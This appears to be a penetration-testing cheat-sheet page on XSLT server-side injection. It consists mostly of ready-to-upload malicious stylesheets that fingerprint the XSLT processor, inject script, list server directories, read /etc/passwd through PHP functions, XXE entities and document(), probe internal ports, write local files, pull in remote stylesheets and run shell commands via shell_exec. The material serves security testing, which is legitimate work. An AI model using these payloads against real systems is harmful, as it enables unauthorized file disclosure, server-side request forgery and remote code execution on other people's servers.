XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
It is used to transform XML documents in another kind. Versions: 1, 2 and 3 (1 is the most used). The transformation can be done in the server or in the browser).
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
Upload this and take information
<?xml version="1.0" encoding="ISO-8859-1"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/">Version: <xsl:value-of select="system-property('xsl:version')" /><br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br /><xsl:if test="system-property('xsl:product-name')">Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br /></xsl:if><xsl:if test="system-property('xsl:product-version')">Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br /></xsl:if><xsl:if test="system-property('xsl:is-schema-aware')">Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br /></xsl:if><xsl:if test="system-property('xsl:supports-serialization')">Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"/><br /></xsl:if><xsl:if test="system-property('xsl:supports-backwards-compatibility')">Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"/><br /></xsl:if></xsl:template></xsl:stylesheet>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><script>confirm("We're good");</script></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('opendir','/path/to/dir')"/><xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -<xsl:value-of select="php:function('readdir')"/> -</xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="UTF-8"?><html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE"><xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" /><br /></body></html>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/">&ext_file;</xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><xsl:value-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>
<!DOCTYPE xsl:stylesheet [<!ENTITY passwd SYSTEM "file:///etc/passwd" >]><xsl:template match="/">&passwd;</xsl:template>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('file_get_contents','/path/to/file')"/></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="UTF-8"?><html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE"><xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" /><br /></body></html>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="document('http://example.com:22')"/></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:result-document href="local_file.txt"><xsl:text>Write Local File</xsl:text></xsl:result-document></xsl:template></xsl:stylesheet>
<xsl:template match="/"><redirect:open file="local_file.txt"/><redirect:write file="local_file.txt"/> Write Local File</redirect:write><redirect:close file="loxal_file.txt"/></xsl:template>
Other ways to write files in the PDF
<xsl:include href="http://extenal.web/external.xsl"/>
<?xml version="1.0" ?><?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('shell_exec','sleep 10')" /></xsl:template></xsl:stylesheet>
<?xml version="1.0" encoding="UTF-8"?><html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE"><xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" /><br /></body></html>
Execute code using other frameworks in the PDF
​XSLT_SSRF http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf​
Last updated 11 months ago